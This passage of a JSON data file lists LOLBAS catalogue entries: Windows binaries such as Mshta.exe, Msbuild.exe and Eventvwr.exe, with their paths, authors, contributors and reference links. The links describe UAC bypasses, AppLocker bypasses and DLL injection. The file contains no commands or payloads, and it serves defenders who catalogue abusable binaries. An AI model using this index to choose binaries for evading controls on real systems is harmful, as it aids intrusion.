@nikhil_mitt"],"references":["https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83","https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html","https://github.com/dim0x69/dns-exe-persistance/tree/master/dns-plugindll-vcpp","https://twitter.com/Hexacorn/status/994000792628719618","http://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html","https://lolbas-project.github.io/lolbas/Binaries/Dnscmd/"],"count":1},{"id":"lolbas:esentutl-exe","name":"Esentutl.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\esentutl.exe","C:\\Windows\\SysWOW64\\esentutl.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["egre55 @egre55","Mike Cary @grayfold3d"],"references":["https://twitter.com/egre55/status/985994639202283520","https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/","https://twitter.com/bohops/status/1094810861095534592","https://lolbas-project.github.io/lolbas/Binaries/Esentutl/"],"count":6},{"id":"lolbas:eudcedit-exe","name":"Eudcedit.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\windows\\system32\\eudcedit.exe","c:\\windows\\syswow64\\eudcedit.exe"],"author":"Matan Bahar","created":"2025-08-07T00:00:00.000Z","contributors":["Matan Bahar @Bl4ckShad3"],"references":["https://medium.com/@matanb707/windows-fonts-exploitation-in-2025-bypassing-uac-with-eudcedit-915599705639","https://lolbas-project.github.io/lolbas/Binaries/Eudcedit/"],"count":1},{"id":"lolbas:eventvwr-exe","name":"Eventvwr.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\eventvwr.exe","C:\\Windows\\SysWOW64\\eventvwr.exe"],"author":"Jacob Gajek","created":"2018-11-01T00:00:00.000Z","contributors":["Matt Nelson @enigma0x3","Matt Graeber @mattifestation","Orange Tsai @orange_8361"],"references":["https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/","https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-EventVwrBypass.ps1","https://twitter.com/orange_8361/status/1518970259868626944","https://lolbas-project.github.io/lolbas/Binaries/Eventvwr/"],"count":2},{"id":"lolbas:expand-exe","name":"Expand.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\Expand.exe","C:\\Windows\\SysWOW64\\Expand.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Rahmat Nurfauzi @infosecn1nja","Oddvar Moe @oddvarmoe"],"references":["https://twitter.com/infosecn1nja/status/986628482858807297","https://twitter.com/Oddvarmoe/status/986709068759949319","https://lolbas-project.github.io/lolbas/Binaries/Expand/"],"count":3},{"id":"lolbas:explorer-exe","name":"Explorer.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\explorer.exe","C:\\Windows\\SysWOW64\\explorer.exe"],"author":"Jai Minton","created":"2020-06-24T00:00:00.000Z","contributors":["Jai Minton @CyberRaiju","Jimmy @bohops"],"references":["https://twitter.com/CyberRaiju/status/1273597319322058752?s=20","https://twitter.com/bohops/status/1276356245541335048","https://twitter.com/bohops/status/986984122563391488","https://lolbas-project.github.io/lolbas/Binaries/Explorer/"],"count":2},{"id":"lolbas:extexport-exe","name":"Extexport.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Program Files\\Internet Explorer\\Extexport.exe","C:\\Program Files (x86)\\Internet Explorer\\Extexport.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Adam @hexacorn"],"references":["http://www.hexacorn.com/blog/2018/04/24/extexport-yet-another-lolbin/","https://lolbas-project.github.io/lolbas/Binaries/Extexport/"],"count":1},{"id":"lolbas:extrac32-exe","name":"Extrac32.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\extrac32.exe","C:\\Windows\\SysWOW64\\extrac32.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["egre55 @egre55","Oddvar Moe @oddvarmoe","Hai Vaknin(Lux @VakninHai","Tamir Yehuda @tim8288"],"references":["https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/","https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://twitter.com/egre55/status/985994639202283520","https://lolbas-project.github.io/lolbas/Binaries/Extrac32/"],"count":4},{"id":"lolbas:findstr-exe","name":"Findstr.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\findstr.exe","C:\\Windows\\SysWOW64\\findstr.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Oddvar Moe @oddvarmoe"],"references":["https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/","https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://lolbas-project.github.io/lolbas/Binaries/Findstr/"],"count":4},{"id":"lolbas:finger-exe","name":"Finger.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\windows\\system32\\finger.exe","c:\\windows\\syswow64\\finger.exe"],"author":"Ruben Revuelta","created":"2021-08-30T00:00:00.000Z","contributors":["Ruben Revuelta (MAPFRE CERT) @rubn_RB","Jose A. Jimenez (MAPFRE CERT) @Ocelotty6669","Malwrologist @DissectMalware"],"references":["https://twitter.com/DissectMalware/status/997340270273409024","https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/ff961508(v=ws.11)","https://lolbas-project.github.io/lolbas/Binaries/Finger/"],"count":1},{"id":"lolbas:fltmc-exe","name":"fltMC.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\fltMC.exe"],"author":"John Lambert","created":"2021-09-18T00:00:00.000Z","contributors":["Carlos Perez @Carlos_Perez"],"references":["https://www.darkoperator.com/blog/2018/10/5/operating-offensively-against-sysmon","https://lolbas-project.github.io/lolbas/Binaries/fltMC/"],"count":1},{"id":"lolbas:forfiles-exe","name":"Forfiles.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\forfiles.exe","C:\\Windows\\SysWOW64\\forfiles.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Eric @vector_sec","Oddvar Moe @oddvarmoe"],"references":["https://twitter.com/vector_sec/status/896049052642533376","https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/","https://lolbas-project.github.io/lolbas/Binaries/Forfiles/"],"count":2},{"id":"lolbas:fsutil-exe","name":"Fsutil.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\fsutil.exe","C:\\Windows\\SysWOW64\\fsutil.exe"],"author":"Elliot Killick","created":"2021-08-16T00:00:00.000Z","contributors":["Elliot Killick @elliotkillick","Jimmy @bohops","Grzegorz Tworek @0gtweet"],"references":["https://twitter.com/0gtweet/status/1720724516324704404","https://lolbas-project.github.io/lolbas/Binaries/Fsutil/"],"count":3},{"id":"lolbas:ftp-exe","name":"Ftp.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\ftp.exe","C:\\Windows\\SysWOW64\\ftp.exe"],"author":"Oddvar Moe","created":"2018-12-10T00:00:00.000Z","contributors":["Casey Smith @subtee","BennyHusted","Amit Serper @0xAmit"],"references":["https://twitter.com/0xAmit/status/1070063130636640256","https://medium.com/@0xamit/lets-talk-about-security-research-discoveries-and-proper-discussion-etiquette-on-twitter-10f9be6d1939","https://ss64.com/nt/ftp.html","https://www.asafety.fr/vuln-exploit-poc/windows-dos-powershell-upload-de-fichier-en-ligne-de-commande-one-liner/","https://lolbas-project.github.io/lolbas/Binaries/Ftp/"],"count":2},{"id":"lolbas:gpscript-exe","name":"Gpscript.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\gpscript.exe","C:\\Windows\\SysWOW64\\gpscript.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Oddvar Moe @oddvarmoe"],"references":["https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/","https://lolbas-project.github.io/lolbas/Binaries/Gpscript/"],"count":2},{"id":"lolbas:hh-exe","name":"Hh.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\hh.exe","C:\\Windows\\SysWOW64\\hh.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Oddvar Moe @oddvarmoe"],"references":["https://oddvar.moe/2017/08/13/bypassing-device-guard-umci-using-chm-cve-2017-8625/","https://lolbas-project.github.io/lolbas/Binaries/Hh/"],"count":3},{"id":"lolbas:imewdbld-exe","name":"IMEWDBLD.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\IME\\SHARED\\IMEWDBLD.exe"],"author":"Wade Hickey","created":"2020-03-05T00:00:00.000Z","contributors":["Wade Hickey @notwhickey"],"references":["https://twitter.com/notwhickey/status/1367493406835040265","https://lolbas-project.github.io/lolbas/Binaries/IMEWDBLD/"],"count":1},{"id":"lolbas:ie4uinit-exe","name":"Ie4uinit.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\windows\\system32\\ie4uinit.exe","c:\\windows\\sysWOW64\\ie4uinit.exe","c:\\windows\\system32\\ieuinit.inf","c:\\windows\\sysWOW64\\ieuinit.inf"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Jimmy @bohops"],"references":["https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/","https://lolbas-project.github.io/lolbas/Binaries/Ie4uinit/"],"count":1},{"id":"lolbas:iediagcmd-exe","name":"iediagcmd.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Program Files\\Internet Explorer\\iediagcmd.exe"],"author":"manasmbellani","created":"2022-03-29T00:00:00.000Z","contributors":["Adam @hexacorn"],"references":["https://twitter.com/Hexacorn/status/1507516393859731456","https://lolbas-project.github.io/lolbas/Binaries/iediagcmd/"],"count":1},{"id":"lolbas:ieexec-exe","name":"Ieexec.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\ieexec.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\ieexec.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Casey Smith @subtee"],"references":["https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/","https://lolbas-project.github.io/lolbas/Binaries/Ieexec/"],"count":2},{"id":"lolbas:ilasm-exe","name":"Ilasm.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ilasm.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ilasm.exe"],"author":"Hai vaknin (lux)","created":"2020-03-17T00:00:00.000Z","contributors":["Hai Vaknin(Lux) @VakninHai","Lior Adar"],"references":["https://github.com/LuxNoBulIshit/BeforeCompileBy-ilasm/blob/master/hello_world.txt","https://lolbas-project.github.io/lolbas/Binaries/Ilasm/"],"count":2},{"id":"lolbas:infdefaultinstall-exe","name":"Infdefaultinstall.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\Infdefaultinstall.exe","C:\\Windows\\SysWOW64\\Infdefaultinstall.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Kyle Hanslovan @kylehanslovan"],"references":["https://twitter.com/KyleHanslovan/status/911997635455852544","https://blog.conscioushacker.io/index.php/2017/10/25/evading-microsofts-autoruns/","https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/","https://lolbas-project.github.io/lolbas/Binaries/Infdefaultinstall/"],"count":1},{"id":"lolbas:installutil-exe","name":"Installutil.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\InstallUtil.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\InstallUtil.exe","C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\InstallUtil.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Casey Smith @subtee","Nir Chako (Pentera) @C_h4ck_0"],"references":["https://pentestlab.blog/2017/05/08/applocker-bypass-installutil/","https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_12","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md","https://www.blackhillsinfosec.com/powershell-without-powershell-how-to-bypass-application-whitelisting-environment-restrictions-av/","https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/","https://docs.microsoft.com/en-us/dotnet/framework/tools/installutil-exe-installer-tool","https://lolbas-project.github.io/lolbas/Binaries/Installutil/"],"count":3},{"id":"lolbas:iscsicpl-exe","name":"iscsicpl.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\windows\\system32\\iscsicpl.exe","c:\\windows\\syswow64\\iscsicpl.exe"],"author":"Ekitji","created":"2025-08-17T00:00:00.000Z","contributors":["hacker.house","Ekitji @eki_erk"],"references":["https://learn.microsoft.com/en-us/windows-server/storage/iscsi/iscsi-initiator-portal","https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC","https://lolbas-project.github.io/lolbas/Binaries/iscsicpl/"],"count":2},{"id":"lolbas:jsc-exe","name":"Jsc.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Jsc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Jsc.exe","C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Jsc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Jsc.exe"],"author":"Oddvar Moe","created":"2019-05-31T00:00:00.000Z","contributors":["Malwrologist @DissectMalware"],"references":["https://twitter.com/DissectMalware/status/998797808907046913","https://www.phpied.com/make-your-javascript-a-windows-exe/","https://lolbas-project.github.io/lolbas/Binaries/Jsc/"],"count":2},{"id":"lolbas:ldifde-exe","name":"Ldifde.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\windows\\system32\\ldifde.exe","c:\\windows\\syswow64\\ldifde.exe"],"author":"Grzegorz Tworek","created":"2022-08-31T00:00:00.000Z","contributors":["Grzegorz Tworek @0gtweet"],"references":["https://twitter.com/0gtweet/status/1564968845726580736","https://lolbas-project.github.io/lolbas/Binaries/Ldifde/"],"count":1},{"id":"lolbas:makecab-exe","name":"Makecab.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\makecab.exe","C:\\Windows\\SysWOW64\\makecab.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Oddvar Moe @oddvarmoe"],"references":["https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://ss64.com/nt/makecab-directives.html","https://www.pearsonhighered.com/assets/samplechapter/0/7/8/9/0789728583.pdf","https://learn.microsoft.com/en-us/previous-versions/bb417343(v=msdn.10)#makecab-application","https://lolbas-project.github.io/lolbas/Binaries/Makecab/"],"count":4},{"id":"lolbas:mavinject-exe","name":"Mavinject.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\mavinject.exe","C:\\Windows\\SysWOW64\\mavinject.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Giuseppe N3mes1s @gN3mes1s","Oddvar Moe @oddvarmoe"],"references":["https://twitter.com/gN3mes1s/status/941315826107510784","https://twitter.com/Hexcorn/status/776122138063409152","https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/","https://lolbas-project.github.io/lolbas/Binaries/Mavinject/"],"count":2},{"id":"lolbas:microsoft-workflow-compiler-exe","name":"Microsoft.Workflow.Compiler.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\Microsoft.Net\\Framework64\\v4.0.30319\\Microsoft.Workflow.Compiler.exe"],"author":"Conor Richard","created":"2018-10-22T00:00:00.000Z","contributors":["Matt Graeber @mattifestation","John Bergbom @BergbomJohn","FortyNorth Security @FortyNorthSec","Bank Security @Bank_Security"],"references":["https://twitter.com/mattifestation/status/1030445200475185154","https://posts.specterops.io/arbitrary-unsigned-code-execution-vector-in-microsoft-workflow-compiler-exe-3d9294bc5efb","https://gist.github.com/mattifestation/3e28d391adbd7fe3e0c722a107a25aba#file-workflowcompilerdetectiontests-ps1","https://gist.github.com/mattifestation/7ba8fc8f724600a9f525714c9cf767fd#file-createcompilerinputxml-ps1","https://www.forcepoint.com/blog/security-labs/using-c-post-powershell-attacks","https://www.fortynorthsecurity.com/microsoft-workflow-compiler-exe-veil-and-cobalt-strike/","https://medium.com/@Bank_Security/undetectable-c-c-reverse-shells-fab4c0ec4f15","https://lolbas-project.github.io/lolbas/Binaries/Microsoft.Workflow.Compiler/"],"count":3},{"id":"lolbas:mmc-exe","name":"Mmc.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\mmc.exe","C:\\Windows\\SysWOW64\\mmc.exe"],"author":"@bohops","created":"2018-12-04T00:00:00.000Z","contributors":["Jimmy @bohops","clem @clavoillotte","Fredrik H. Brathen"],"references":["https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/","https://offsec.almond.consulting/UAC-bypass-dotnet.html","https://www.youtube.com/watch?v=LFgZOTmhzeA","https://lolbas-project.github.io/lolbas/Binaries/Mmc/"],"count":3},{"id":"lolbas:mofcomp-exe","name":"Mofcomp.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\wbem\\mofcomp.exe","C:\\Windows\\SysWOW64\\wbem\\mofcomp.exe"],"author":"Daniel Gott","created":"2022-07-19T00:00:00.000Z","contributors":["Daniel Gott @gott_cyber","The DFIR Report @TheDFIRReport","Nasreddine Bencherchali @nas_bench"],"references":["https://docs.microsoft.com/en-us/windows/win32/wmisdk/mofcomp","https://docs.microsoft.com/en-us/windows/win32/wmisdk/managed-object-format--mof-","https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/","https://in.security/2019/04/03/an-intro-into-abusing-and-identifying-wmi-event-subscriptions-for-persistence/","https://medium.com/threatpunter/detecting-removing-wmi-persistence-60ccbb7dff96","https://lolbas-project.github.io/lolbas/Binaries/Mofcomp/"],"count":1},{"id":"lolbas:mpcmdrun-exe","name":"MpCmdRun.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2008.4-0\\MpCmdRun.exe","C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2008.7-0\\MpCmdRun.exe","C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2008.9-0\\MpCmdRun.exe","C:\\Program Files\\Windows Defender\\MpCmdRun.exe","C:\\Program Files (x86)\\Windows Defender\\MpCmdRun.exe","C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.23110.3-0\\X86\\MpCmdRun.exe"],"author":"Oddvar Moe","created":"2020-03-20T00:00:00.000Z","contributors":["Askar @mohammadaskar2","Oddvar Moe @oddvarmoe","RichRumble","Cedric @th3c3dr1c"],"references":["https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-antivirus/command-line-arguments-microsoft-defender-antivirus","https://twitter.com/mohammadaskar2/status/1301263551638761477","https://twitter.com/Oddvarmoe/status/1301444858910052352","https://twitter.com/NotMedic/status/1301506813242867720","https://lolbas-project.github.io/lolbas/Binaries/MpCmdRun/"],"count":3},{"id":"lolbas:msbuild-exe","name":"Msbuild.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework\\v3.5\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v3.5\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Msbuild.exe","C:\\Program Files (x86)\\MSBuild\\14.0\\bin\\MSBuild.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Casey Smith @subtee","Cn33liz @Cneelis","Jimmy @bohops"],"references":["https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md","https://github.com/Cn33liz/MSBuildShell","https://pentestlab.blog/2017/05/29/applocker-bypass-msbuild/","https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/","https://gist.github.com/bohops/4ffc43a281e87d108875f07614324191","https://github.com/LOLBAS-Project/LOLBAS/issues/165","https://docs.microsoft.com/en-us/visualstudio/msbuild/msbuild-response-files","https://www.daveaglick.com/posts/msbuild-loggers-and-logging-events","https://lolbas-project.github.io/lolbas/Binaries/Msbuild/"],"count":5},{"id":"lolbas:msconfig-exe","name":"Msconfig.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\msconfig.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Pierre-Alexandre Braeken @pabraeken"],"references":["https://twitter.com/pabraeken/status/991314564896690177","https://lolbas-project.github.io/lolbas/Binaries/Msconfig/"],"count":1},{"id":"lolbas:msdt-exe","name":"Msdt.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\Msdt.exe","C:\\Windows\\SysWOW64\\Msdt.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Nasreddine Bencherchali @nas_bench"],"references":["https://web.archive.org/web/20160322142537/https://cybersyndicates.com/2015/10/a-no-bull-guide-to-malicious-windows-trouble-shooting-packs-and-application-whitelist-bypass/","https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/","https://twitter.com/harr0ey/status/991338229952598016","https://twitter.com/nas_bench/status/1531944240271568896","https://lolbas-project.github.io/lolbas/Binaries/Msdt/"],"count":3},{"id":"lolbas:msedge-exe","name":"Msedge.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe","c:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe"],"author":"mr.d0x","created":"2022-01-20T00:00:00.000Z","contributors":["mr.d0x @mrd0x"],"references":["https://twitter.com/mrd0x/status/1478116126005641220","https://twitter.com/mrd0x/status/1478234484881436672","https://lolbas-project.github.io/lolbas/Binaries/Msedge/"],"count":3},{"id":"lolbas:mshta-exe","name":"Mshta.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\mshta.exe","C:\\Windows\\SysWOW64\\mshta.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Casey Smith @subtee","Oddvar Moe @oddvarmoe","Nir Chako (Pentera) @C_h4ck_0"],"references":["https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_4","https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/mshta.sct","https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/","https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/","https://lolbas-project.github.io/lolbas/Binaries/Mshta/"],"count":5},{"id":"lolbas:msiexec-exe","name":"Msiexec.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\msiexec.exe","C:\\Windows\\SysWOW64\\msiexec.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["netbiosX @netbiosX","Philip Tsukerman @PhilipTsukerman"],"references":["https://pentestlab.blog/2017/06/16/applocker-bypass-msiexec/","https://twitter.com/PhilipTsukerman/status/992021361106268161","https://badoption.eu/blog/2023/10/03/MSIFortune.html","https://lolbas-project.github.io/lolbas/Binaries/Msiexec/"],"count":5},{"id":"lolbas:msoxmled-exe","name":"msoxmled.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Program Files\\Microsoft Office\\root\\vfs\\ProgramFilesCommonX64\\Microsoft Shared\\Office16\\msoxmled.exe","C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE14\\msoxmled.exe"],"author":"Bogac Kaya","created":"2025-08-22T00:00:00.000Z","contributors":["Bogac Kaya @bogackayaa","Furkan Celik @frknclk034"],"references":["https://learn.microsoft.com/en-us/answers/questions/4805030/where-is-msoxmled-exe-for-office-professional-2013","https://lolbas-project.github.io/lolbas/Binaries/msoxmled/"],"count":1},{"id":"lolbas:netsh-exe","name":"Netsh.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\WINDOWS\\System32\\Netsh.exe","C:\\WINDOWS\\SysWOW64\\Netsh.exe"],"author":"Freddie Barr-Smith","created":"2019-12-24T00:00:00.000Z","contributors":["Freddie Barr-Smith","Riccardo Spolaor","Mariano Graziano","Xabier Ugarte-Pedrero"],"references":["https://freddiebarrsmith.com/trix/trix.html","https://htmlpreview.github.io/?https://github.com/MatthewDemaske/blogbackup/blob/master/netshell.html","https://liberty-shell.com/sec/2018/07/28/netshlep/","https://lolbas-project.github.io/lolbas/Binaries/Netsh/"],"count":1},{"id":"lolbas:ngen-exe","name":"Ngen.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\ngen.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\ngen.exe","C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe"],"author":"Avihay Eldad","created":"2024-02-19T00:00:00.000Z","contributors":["Avihay Eldad @AvihayEldad"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Ngen/"],"count":1},{"id":"lolbas:odbcconf-exe","name":"Odbcconf.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\odbcconf.exe","C:\\Windows\\SysWOW64\\odbcconf.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Casey Smith @subtee","Adam @Hexacorn"],"references":["https://gist.github.com/NickTyrer/6ef02ce3fd623483137b45f65017352b","https://github.com/woanware/application-restriction-bypasses","https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/","https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/"],"count":3},{"id":"lolbas:offlinescannershell-exe","name":"OfflineScannerShell.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Program Files\\Windows Defender\\Offline\\OfflineScannerShell.exe"],"author":"Elliot Killick","created":"2021-08-16T00:00:00.000Z","contributors":["Elliot Killick @elliotkillick"],"references":["https://lolbas-project.github.io/lolbas/Binaries/OfflineScannerShell/"],"count":1},{"id":"lolbas:onedrivestandaloneupdater-exe","name":"OneDriveStandaloneUpdater.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Users\\<username>\\AppData\\Local\\Microsoft\\OneDrive\\OneDriveStandaloneUpdater.exe","C:\\Program Files\\Microsoft OneDrive\\OneDriveStandaloneUpdater.exe","C:\\Program Files (x86)\\Microsoft OneDrive\\OneDriveStandaloneUpdater.exe"],"author":"Elliot Killick","created":"2021-08-22T00:00:00.000Z","contributors":["Elliot Killick 